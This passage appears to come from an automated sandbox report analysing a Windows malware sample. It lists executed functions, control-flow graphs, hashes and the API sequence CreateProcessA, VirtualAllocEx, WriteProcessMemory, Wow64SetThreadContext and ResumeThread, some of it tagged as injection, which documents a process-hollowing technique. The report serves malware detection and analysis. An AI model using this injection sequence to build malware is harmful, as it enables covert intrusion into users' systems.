18243->18243 18244->18243 18245->18243 18247 61276c3 ReadProcessMemory 18246->18247 18249 6127707 18247->18249 18249->18167 18251 61276c3 ReadProcessMemory 18250->18251 18253 6127707 18251->18253 18253->18167 18255 6127899 18254->18255 18255->18255 18256 61279fe CreateProcessA 18255->18256 18257 6127a5b 18256->18257 18259 6127899 18258->18259 18259->18259 18260 61279fe CreateProcessA 18259->18260 18261 6127a5b 18260->18261 18263 6127435 Wow64SetThreadContext 18262->18263 18265 612747d 18263->18265 18265->18177 18267 61273ee Wow64SetThreadContext 18266->18267 18269 612747d 18267->18269 18269->18177 18271 6127435 Wow64SetThreadContext 18270->18271 18273 612747d 18271->18273 18273->18177 18275 6126f48 ResumeThread 18274->18275 18277 6126f79 18275->18277 18277->18178 18279 6126f48 ResumeThread 18278->18279 18281 6126f79 18279->18281 18281->18178 18283 61275d0 WriteProcessMemory 18282->18283 18285 6127627 18283->18285 18285->18192 18287 61275d0 WriteProcessMemory 18286->18287 18289 6127627 18287->18289 18289->18192 18291 61274c6 VirtualAllocEx 18290->18291 18293 6127545 18291->18293 18293->18202 18295 6127508 VirtualAllocEx 18294->18295 18297 6127545 18295->18297 18297->18202 18299 6127508 VirtualAllocEx 18298->18299 18301 6127545 18299->18301 18301->18202 18302 612a6f8 18303 612a883 18302->18303 18304 612a71e 18302->18304 18304->18303 18306 6128bc8 18304->18306 18307 612a978 PostMessageW 18306->18307 18308 612a9e4 18307->18308 18308->18304 18316 612416e 18317 612417e 18316->18317 18319 6126b18 ResumeThread 18317->18319 18320 6126b08 ResumeThread 18317->18320 18318 6124573 18319->18318 18320->18318

                                              Executed Functions

                                              Function 06127805 Relevance: 1.7, APIs: 1, Instructions: 246processCOMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 800 6127805-61278a5 802 61278a7-61278b1 800->802 803 61278de-61278fe 800->803 802->803 804 61278b3-61278b5 802->804 810 6127900-612790a 803->810 811 6127937-6127966 803->811 805 61278b7-61278c1 804->805 806 61278d8-61278db 804->806 808 61278c3 805->808 809 61278c5-61278d4 805->809 806->803 808->809 809->809 812 61278d6 809->812 810->811 813 612790c-612790e 810->813 817 6127968-6127972 811->817 818 612799f-6127a59 CreateProcessA 811->818 812->806 815 6127910-612791a 813->815 816 6127931-6127934 813->816 819 612791e-612792d 815->819 820 612791c 815->820 816->811 817->818 822 6127974-6127976 817->822 831 6127a62-6127ae8 818->831 832 6127a5b-6127a61 818->832 819->819 821 612792f 819->821 820->819 821->816 823 6127978-6127982 822->823 824 6127999-612799c 822->824 826 6127986-6127995 823->826 827 6127984 823->827 824->818 826->826 829 6127997 826->829 827->826 829->824 842 6127aea-6127aee 831->842 843 6127af8-6127afc 831->843 832->831 842->843 846 6127af0 842->846 844 6127afe-6127b02 843->844 845 6127b0c-6127b10 843->845 844->845 847 6127b04 844->847 848 6127b12-6127b16 845->848 849 6127b20-6127b24 845->849 846->843 847->845 848->849 850 6127b18 848->850 851 6127b36-6127b3d 849->851 852 6127b26-6127b2c 849->852 850->849 853 6127b54 851->853 854 6127b3f-6127b4e 851->854 852->851 855 6127b55 853->855 854->853 855->855
                                              APIs
                                              • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 06127A46
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2054681580.0000000006120000.00000040.00000800.00020000.00000000.sdmp, Offset: 06120000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_6120000_TuZRpLi.jbxd
                                              Similarity
                                              • API ID: CreateProcess
                                              • String ID:
                                              • API String ID: 963392458-0
                                              • Opcode ID: 68050dd2e57a42cb9fe0664726e5b4ba6194fae171c1cf9b889ee0653bda6e71
                                              • Instruction ID: 7fa5d8883da96ee40f7a6b6de46419edb927408cf3f3b26839bef3b9c44aac72
                                              • Opcode Fuzzy Hash: 68050dd2e57a42cb9fe0664726e5b4ba6194fae171c1cf9b889ee0653bda6e71
                                              • Instruction Fuzzy Hash: AEA16B71D0022ACFDF54DF68C8517EEBBB2BF48314F1485AAD808A7290DB749995CF91
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 06127810 Relevance: 1.7, APIs: 1, Instructions: 243processCOMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 857 6127810-61278a5 859 61278a7-61278b1 857->859 860 61278de-61278fe 857->860 859->860 861 61278b3-61278b5 859->861 867 6127900-612790a 860->867 868 6127937-6127966 860->868 862 61278b7-61278c1 861->862 863 61278d8-61278db 861->863 865 61278c3 862->865 866 61278c5-61278d4 862->866 863->860 865->866 866->866 869 61278d6 866->869 867->868 870 612790c-612790e 867->870 874 6127968-6127972 868->874 875 612799f-6127a59 CreateProcessA 868->875 869->863 872 6127910-612791a 870->872 873 6127931-6127934 870->873 876 612791e-612792d 872->876 877 612791c 872->877 873->868 874->875 879 6127974-6127976 874->879 888 6127a62-6127ae8 875->888 889 6127a5b-6127a61 875->889 876->876 878 612792f 876->878 877->876 878->873 880 6127978-6127982 879->880 881 6127999-612799c 879->881 883 6127986-6127995 880->883 884 6127984 880->884 881->875 883->883 886 6127997 883->886 884->883 886->881 899 6127aea-6127aee 888->899 900 6127af8-6127afc 888->900 889->888 899->900 903 6127af0 899->903 901 6127afe-6127b02 900->901 902 6127b0c-6127b10 900->902 901->902 904 6127b04 901->904 905 6127b12-6127b16 902->905 906 6127b20-6127b24 902->906 903->900 904->902 905->906 907 6127b18 905->907 908 6127b36-6127b3d 906->908 909 6127b26-6127b2c 906->909 907->906 910 6127b54 908->910 911 6127b3f-6127b4e 908->911 909->908 912 6127b55 910->912 911->910 912->912
                                              APIs
                                              • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 06127A46
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2054681580.0000000006120000.00000040.00000800.00020000.00000000.sdmp, Offset: 06120000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_6120000_TuZRpLi.jbxd
                                              Similarity
                                              • API ID: CreateProcess
                                              • String ID:
                                              • API String ID: 963392458-0
                                              • Opcode ID: 592962dae5ce38143f62c9b18be2f97e46bdd6e003c699670e7306f0a1380398
                                              • Instruction ID: 8b0aa27fc6ffa237879324606163fa42aaa9c4b85bcc503a395f611844792846
                                              • Opcode Fuzzy Hash: 592962dae5ce38143f62c9b18be2f97e46bdd6e003c699670e7306f0a1380398
                                              • Instruction Fuzzy Hash: 59915C71D0022ACFDF64DF68C841BDEBBB2BF44314F1485AAD808A7290DB759995CF91
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 01095CB4 Relevance: 1.6, APIs: 1, Instructions: 97COMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 914 1095cb4-1095cbc 915 1095cc4-1095d81 CreateActCtxA 914->915 917 1095d8a-1095de4 915->917 918 1095d83-1095d89 915->918 925 1095df3-1095df7 917->925 926 1095de6-1095de9 917->926 918->917 927 1095df9-1095e05 925->927 928 1095e08 925->928 926->925 927->928 930 1095e09 928->930 930->930
                                              APIs
                                              • CreateActCtxA.KERNEL32(?), ref: 01095D71
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2046230708.0000000001090000.00000040.00000800.00020000.00000000.sdmp, Offset: 01090000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_1090000_TuZRpLi.jbxd
                                              Similarity
                                              • API ID: Create
                                              • String ID:
                                              • API String ID: 2289755597-0
                                              • Opcode ID: 6f19ecc660a9979dadfd96958090e6763f5f6887d680855a801b00b9595dbea6
                                              • Instruction ID: 7ccecdcf3419d5f7c16a5ecb7d36f3ffcbf886981a40c3d003b967d4d6c5980c
                                              • Opcode Fuzzy Hash: 6f19ecc660a9979dadfd96958090e6763f5f6887d680855a801b00b9595dbea6
                                              • Instruction Fuzzy Hash: 6A41F2B0C00619CFDB25DFAAC848BCDBBF1BF48304F20805AD418AB265DB75694ACF91
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 01094608 Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 931 1094608-1095d81 CreateActCtxA 934 1095d8a-1095de4 931->934 935 1095d83-1095d89 931->935 942 1095df3-1095df7 934->942 943 1095de6-1095de9 934->943 935->934 944 1095df9-1095e05 942->944 945 1095e08 942->945 943->942 944->945 947 1095e09 945->947 947->947
                                              APIs
                                              • CreateActCtxA.KERNEL32(?), ref: 01095D71
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2046230708.0000000001090000.00000040.00000800.00020000.00000000.sdmp, Offset: 01090000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_1090000_TuZRpLi.jbxd
                                              Similarity
                                              • API ID: Create
                                              • String ID:
                                              • API String ID: 2289755597-0
                                              • Opcode ID: 3f30fab71da01d90961e7cc97d58561620342499fe3744d70dd3b854b487339f
                                              • Instruction ID: f54b0d29d628c7768b33b50fb79e94f5f297fad4dd8c4e9d1c6f9793edb18e01
                                              • Opcode Fuzzy Hash: 3f30fab71da01d90961e7cc97d58561620342499fe3744d70dd3b854b487339f
                                              • Instruction Fuzzy Hash: 3F41D2B0C0061DCBDB25DFAAC848B9DBBF5BF48704F20816AD408AB255D775694ACF91
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 06126EA0 Relevance: 1.6, APIs: 1, Instructions: 70threadCOMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 948 6126ea0-6126eac 949 6126f13-6126f77 ResumeThread 948->949 950 6126eae-6126ed7 948->950 957 6126f80-6126fa5 949->957 958 6126f79-6126f7f 949->958 953 6126ed9 950->953 954 6126ede-6126ee1 950->954 953->954 956 6126ee9-6126ef2 954->956 958->957
                                              APIs
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2054681580.0000000006120000.00000040.00000800.00020000.00000000.sdmp, Offset: 06120000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_6120000_TuZRpLi.jbxd
                                              Similarity
                                              • API ID: ResumeThread
                                              • String ID:
                                              • API String ID: 947044025-0
                                              • Opcode ID: 22591716be1c19b67d4212089e0a265b9d6ddf8867cc6fe08616b3ca09d4cf4b
                                              • Instruction ID: de4d510fdc5d4ff5aba88cbb1f41e0eb4625a3c6fc0dd8da738cf39ea215ab97
                                              • Opcode Fuzzy Hash: 22591716be1c19b67d4212089e0a265b9d6ddf8867cc6fe08616b3ca09d4cf4b
                                              • Instruction Fuzzy Hash: 00215774D0024A8FCB20DFA9C8447EEFBF1EF89314F2484AED559A7291CB399945CB91
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 06127580 Relevance: 1.6, APIs: 1, Instructions: 70injectionCOMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 962 6127580-61275d6 964 61275e6-6127625 WriteProcessMemory 962->964 965 61275d8-61275e4 962->965 967 6127627-612762d 964->967 968 612762e-612765e 964->968 965->964 967->968
                                              APIs
                                              • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 06127618
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2054681580.0000000006120000.00000040.00000800.00020000.00000000.sdmp, Offset: 06120000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_6120000_TuZRpLi.jbxd
                                              Similarity
                                              • API ID: MemoryProcessWrite
                                              • String ID:
                                              • API String ID: 3559483778-0
                                              • Opcode ID: cf7ec199f9b34065573d350482dddad3397fe38ce882fa14ddb65a8839a9e45b
                                              • Instruction ID: 71ef58da1490fe6c51ab629fe0d5d260a9426563db3ebb71edf396dec811227e
                                              • Opcode Fuzzy Hash: cf7ec199f9b34065573d350482dddad3397fe38ce882fa14ddb65a8839a9e45b
                                              • Instruction Fuzzy Hash: 452157B59003599FCB10CFA9C985BEEBBF1FF48310F50882AE919A7250C7789555CFA0
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 06127588 Relevance: 1.6, APIs: 1, Instructions: 69injectionCOMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 972 6127588-61275d6 974 61275e6-6127625 WriteProcessMemory 972->974 975 61275d8-61275e4 972->975 977 6127627-612762d 974->977 978 612762e-612765e 974->978 975->974 977->978
                                              APIs
                                              • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 06127618
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2054681580.0000000006120000.00000040.00000800.00020000.00000000.sdmp, Offset: 06120000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_6120000_TuZRpLi.jbxd
                                              Similarity
                                              • API ID: MemoryProcessWrite
                                              • String ID:
                                              • API String ID: 3559483778-0
                                              • Opcode ID: 5ff58b744b7ba7577a0744b6dc860a03c607af78769a2d8d8acbe64057e390d8
                                              • Instruction ID: ffe54b113f13fdc5f215954de802236e683ed9904090e55a18c408b421ea199a
                                              • Opcode Fuzzy Hash: 5ff58b744b7ba7577a0744b6dc860a03c607af78769a2d8d8acbe64057e390d8
                                              • Instruction Fuzzy Hash: 0F2169B1D003599FCB10CFA9C884BEEBBF5FF48310F108429E918A7240D7789950CBA0
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 061273E8 Relevance: 1.6, APIs: 1, Instructions: 65threadCOMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 982 61273e8-612743b 985 612744b-612747b Wow64SetThreadContext 982->985 986 612743d-6127449 982->986 988 6127484-61274b4 985->988 989 612747d-6127483 985->989 986->985 989->988
                                              APIs
                                              • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 0612746E
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2054681580.0000000006120000.00000040.00000800.00020000.00000000.sdmp, Offset: 06120000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_6120000_TuZRpLi.jbxd
                                              Similarity
                                              • API ID: ContextThreadWow64
                                              • String ID:
                                              • API String ID: 983334009-0
                                              • Opcode ID: 0145038fc1004414676127311255af7c63e079e3cf40f92286ccd01c0a338da0
                                              • Instruction ID: 5c1b1f42d744367add87ac535a68759dcf692a148e4bcfe49e629bbd8e5b6d30
                                              • Opcode Fuzzy Hash: 0145038fc1004414676127311255af7c63e079e3cf40f92286ccd01c0a338da0
                                              • Instruction Fuzzy Hash: B72137B5D002098FDB10DFA9C5857EEBBF4FF48324F50842AD459A7251C7789945CFA1
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 06127671 Relevance: 1.6, APIs: 1, Instructions: 64COMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 993 6127671-6127705 ReadProcessMemory 996 6127707-612770d 993->996 997 612770e-612773e 993->997 996->997
                                              APIs
                                              • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 061276F8
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2054681580.0000000006120000.00000040.00000800.00020000.00000000.sdmp, Offset: 06120000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_6120000_TuZRpLi.jbxd
                                              Similarity
                                              • API ID: MemoryProcessRead
                                              • String ID:
                                              • API String ID: 1726664587-0
                                              • Opcode ID: f5645848cb9f72a82f0d0e2ee0c371e819c06a63846616861d3902376fc65d25
                                              • Instruction ID: bd10a80a42b9c7af529edf5c3cf0bc4a835a74bc163cdbe891930fa032f44b81
                                              • Opcode Fuzzy Hash: f5645848cb9f72a82f0d0e2ee0c371e819c06a63846616861d3902376fc65d25
                                              • Instruction Fuzzy Hash: F12145B5C002598FCB10DFAAC981AEEBBF5FF48310F60842AE519A7250C7389551CFA0
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 06127678 Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 1011 6127678-6127705 ReadProcessMemory 1014 6127707-612770d 1011->1014 1015 612770e-612773e 1011->1015 1014->1015
                                              APIs
                                              • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 061276F8
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2054681580.0000000006120000.00000040.00000800.00020000.00000000.sdmp, Offset: 06120000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_6120000_TuZRpLi.jbxd
                                              Similarity
                                              • API ID: MemoryProcessRead
                                              • String ID:
                                              • API String ID: 1726664587-0
                                              • Opcode ID: 1f5eb617a75427d832252fb13fef6b5c540e739d46bf517a52be913d25d72916
                                              • Instruction ID: b332e4da8d74109679e1b0aca797c7bff8625964c918a6d88debb18c88f6036a
                                              • Opcode Fuzzy Hash: 1f5eb617a75427d832252fb13fef6b5c540e739d46bf517a52be913d25d72916
                                              • Instruction Fuzzy Hash: FD2137B1C003599FDB10DFAAC884AEEFBF5FF48310F50842AE519A7250C7789950CBA1
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 061273F0 Relevance: 1.6, APIs: 1, Instructions: 63threadCOMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 1001 61273f0-612743b 1003 612744b-612747b Wow64SetThreadContext 1001->1003 1004 612743d-6127449 1001->1004 1006 6127484-61274b4 1003->1006 1007 612747d-6127483 1003->1007 1004->1003 1007->1006
                                              APIs
                                              • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 0612746E
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2054681580.0000000006120000.00000040.00000800.00020000.00000000.sdmp, Offset: 06120000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_6120000_TuZRpLi.jbxd
                                              Similarity
                                              • API ID: ContextThreadWow64
                                              • String ID:
                                              • API String ID: 983334009-0
                                              • Opcode ID: 13ff4de37fda01954cedd5b281cacc330e1524e155b4a8c2740fa0c942c6c3ee
                                              • Instruction ID: cf71ca511aa8b86ae8637b304103e22bce7c3c8e9787a9a7c720f94245ab6f87
                                              • Opcode Fuzzy Hash: 13ff4de37fda01954cedd5b281cacc330e1524e155b4a8c2740fa0c942c6c3ee
                                              • Instruction Fuzzy Hash: 192115B1D002098FDB10DFAAC4857EEBBF4EF88324F54842AD559A7251CB78A945CFA1
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 061273EF Relevance: 1.6, APIs: 1, Instructions: 61threadCOMMON
                                              Download Yara Rule
                                              APIs
                                              • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 0612746E
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2054681580.0000000006120000.00000040.00000800.00020000.00000000.sdmp, Offset: 06120000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_6120000_TuZRpLi.jbxd
                                              Similarity
                                              • API ID: ContextThreadWow64
                                              • String ID:
                                              • API String ID: 983334009-0
                                              • Opcode ID: fbc95d06ffca3319a89175f50821ef8c2a06c53b571849aac6fb3ffa9a551aac
                                              • Instruction ID: b81a7f57e0969937733b8063a346d2f719ebd1e73efbc693f27ce4190f6630b6
                                              • Opcode Fuzzy Hash: fbc95d06ffca3319a89175f50821ef8c2a06c53b571849aac6fb3ffa9a551aac
                                              • Instruction Fuzzy Hash: 1C2147B5D002098FDB10DFAAC5857EEBBF4EF48314F14842AD419A7240CB789945CFA0
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 061274C0 Relevance: 1.6, APIs: 1, Instructions: 55memoryCOMMON
                                              Download Yara Rule
                                              APIs
                                              • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 06127536
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2054681580.0000000006120000.00000040.00000800.00020000.00000000.sdmp, Offset: 06120000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_6120000_TuZRpLi.jbxd
                                              Similarity
                                              • API ID: AllocVirtual
                                              • String ID:
                                              • API String ID: 4275171209-0
                                              • Opcode ID: 988aa2431035ac45cce206092939a3fbd984a6b502c0ba1dbe3cd4160086f9ec
                                              • Instruction ID: c669924ba3f5e258c37e7d4eac564cd69f888c6e14f1cf2c515d90c1fec6bdef
                                              • Opcode Fuzzy Hash: 988aa2431035ac45cce206092939a3fbd984a6b502c0ba1dbe3cd4160086f9ec
                                              • Instruction Fuzzy Hash: ED1156768002098FCB10DFA9C845AEFBFF5FF88320F20881AE519A7250C739A551CFA0
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 061274C8 Relevance: 1.6, APIs: 1, Instructions: 53memoryCOMMON
                                              Download Yara Rule
                                              APIs
                                              • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 06127536
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2054681580.0000000006120000.00000040.00000800.00020000.00000000.sdmp, Offset: 06120000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_6120000_TuZRpLi.jbxd
                                              Similarity
                                              • API ID: AllocVirtual
                                              • String ID:
                                              • API String ID: 4275171209-0
                                              • Opcode ID: 498144d37d2e03bc12517bad840886ea7c3c96da668208291adf250e61264488
                                              • Instruction ID: 8b141a83ddf82aaec766aee086ec79468e89983891413436478a8addc6e1534c
                                              • Opcode Fuzzy Hash: 498144d37d2e03bc12517bad840886ea7c3c96da668208291adf250e61264488
                                              • Instruction Fuzzy Hash: 9F1137719002499FCB10DFAAC845AEFFFF5EF88320F208419E519A7250C779A550CFA0
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 061274C7 Relevance: 1.6, APIs: 1, Instructions: 51memoryCOMMON
                                              Download Yara Rule
                                              APIs
                                              • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 06127536
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2054681580.0000000006120000.00000040.00000800.00020000.00000000.sdmp, Offset: 06120000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_6120000_TuZRpLi.jbxd
                                              Similarity
                                              • API ID: AllocVirtual
                                              • String ID:
                                              • API String ID: 4275171209-0
                                              • Opcode ID: 8d035ebbaae017c08945a0f8356718f93ba3aca620c59a3662986a8be62ca2a5
                                              • Instruction ID: 92395eb14bee2c0a3b855eccf8aa52b58be3995b7a2000c754684ab85dbddcb5
                                              • Opcode Fuzzy Hash: 8d035ebbaae017c08945a0f8356718f93ba3aca620c59a3662986a8be62ca2a5
                                              • Instruction Fuzzy Hash: 191137B69002099FCB10DFA9C9457EEFBF5EF48310F248419D519A7250C7799550CFA0
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 06126F00 Relevance: 1.6, APIs: 1, Instructions: 50threadCOMMON
                                              Download Yara Rule
                                              APIs
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2054681580.0000000006120000.00000040.00000800.00020000.00000000.sdmp, Offset: 06120000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_6120000_TuZRpLi.jbxd
                                              Similarity
                                              • API ID: ResumeThread
                                              • String ID:
                                              • API String ID: 947044025-0
                                              • Opcode ID: 6422ecb97b78854acc5b1703562be1fd67e181ddf47effcda62f18be69c057e6
                                              • Instruction ID: c6e46fb557fa62119653ba89376e504c7f39b56744c01f4456f8fdbb795abe33
                                              • Opcode Fuzzy Hash: 6422ecb97b78854acc5b1703562be1fd67e181ddf47effcda62f18be69c057e6
                                              • Instruction Fuzzy Hash: 791146B1D002098FCB10DFA9C4457EEFBF5EF48314F20842AC459A7240CB39A944CFA4
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 06126F08 Relevance: 1.5, APIs: 1, Instructions: 49threadCOMMON
                                              Download Yara Rule
                                              APIs
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2054681580.0000000006120000.00000040.00000800.00020000.00000000.sdmp, Offset: 06120000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_6120000_TuZRpLi.jbxd
                                              Similarity
                                              • API ID: ResumeThread
                                              • String ID:
                                              • API String ID: 947044025-0
                                              • Opcode ID: 32de444d7fc096a19c313ba818405a7d525371804d8616e9cef6050f4ce8d285
                                              • Instruction ID: e32246644eeef43c7ce53951bc42bf5ebfa57fc5f45e3ea36f4902528fd53140
                                              • Opcode Fuzzy Hash: 32de444d7fc096a19c313ba818405a7d525371804d8616e9cef6050f4ce8d285
                                              • Instruction Fuzzy Hash: 8F1128B1D002498FCB10DFAAC4457AFFBF5EF88324F208419D519A7250CB79A944CBA4
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 06128BC8 Relevance: 1.5, APIs: 1, Instructions: 47windowCOMMON
                                              Download Yara Rule
                                              APIs
                                              • PostMessageW.USER32(?,00000010,00000000,?), ref: 0612A9D5
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2054681580.0000000006120000.00000040.00000800.00020000.00000000.sdmp, Offset: 06120000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_6120000_TuZRpLi.jbxd
                                              Similarity
                                              • API ID: MessagePost
                                              • String ID:
                                              • API String ID: 410705778-0
                                              • Opcode ID: 42a13d18f0fc9ab6d2578ee74a62170e3b53d548bfc3df7e6838263f66f42356
                                              • Instruction ID: 0cfd533dda55c7051aa5e5ff9a80ed1f29387f6f1cc830e371453228d552681f
                                              • Opcode Fuzzy Hash: 42a13d18f0fc9ab6d2578ee74a62170e3b53d548bfc3df7e6838263f66f42356
                                              • Instruction Fuzzy Hash: 8B11F2B58003499FDB10DF9AC945BEEBBF8EB48324F10845AE518A7210C379A994CFA1
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 0612A970 Relevance: 1.5, APIs: 1, Instructions: 44windowCOMMON
                                              Download Yara Rule
                                              APIs
                                              • PostMessageW.USER32(?,00000010,00000000,?), ref: 0612A9D5
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2054681580.0000000006120000.00000040.00000800.00020000.00000000.sdmp, Offset: 06120000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_6120000_TuZRpLi.jbxd
                                              Similarity
                                              • API ID: MessagePost
                                              • String ID:
                                              • API String ID: 410705778-0
                                              • Opcode ID: ef0793def058aec759638b4b5a8b78d69a28f5251e2b6f26954e8f97e2ea5b33
                                              • Instruction ID: 7e8b10049a8f34b921c5c390b687259c46994c53f3dcc71977311f7e4d18a903
                                              • Opcode Fuzzy Hash: ef0793def058aec759638b4b5a8b78d69a28f5251e2b6f26954e8f97e2ea5b33
                                              • Instruction Fuzzy Hash: 8E1103B5800359CFCB20DF9AC585BDEBBF8FB48310F10845AD558A7251C379A594CFA4
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 0103D034 Relevance: .1, Instructions: 87COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2045134352.000000000103D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0103D000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_103d000_TuZRpLi.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: e145eab74a1fb0aba45909a8d6aef156210e538c65ddc0c7fd9a5435ee1a5398
                                              • Instruction ID: 69d70fa31fc68de6b09bf3239f64cd2c96af9653d0c0a635e187bbb9f68a8327
                                              • Opcode Fuzzy Hash: e145eab74a1fb0aba45909a8d6aef156210e538c65ddc0c7fd9a5435ee1a5398
                                              • Instruction Fuzzy Hash: 3131AD7554C3809FD703DF64D994755BFB5AF86214F1885EAD8898B2A3C33A880ACB62
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 0102D640 Relevance: .1, Instructions: 75COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2045042905.000000000102D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0102D000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_102d000_TuZRpLi.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 455119949ff129436c838f0899c4d5dbd06f90af54b972bde457e7219790ff3c
                                              • Instruction ID: 471c8e8365d32f0d466122954d6c84b23cc51184a062a550604d4e98bda170f0
                                              • Opcode Fuzzy Hash: 455119949ff129436c838f0899c4d5dbd06f90af54b972bde457e7219790ff3c
                                              • Instruction Fuzzy Hash: C6213371504240DFCB25DF98D9C4F2ABFA5FB88310F20C5A9E94D0B256C33AD816CBA1
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 0103D055 Relevance: .1, Instructions: 73COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2045134352.000000000103D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0103D000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_103d000_TuZRpLi.jbxd
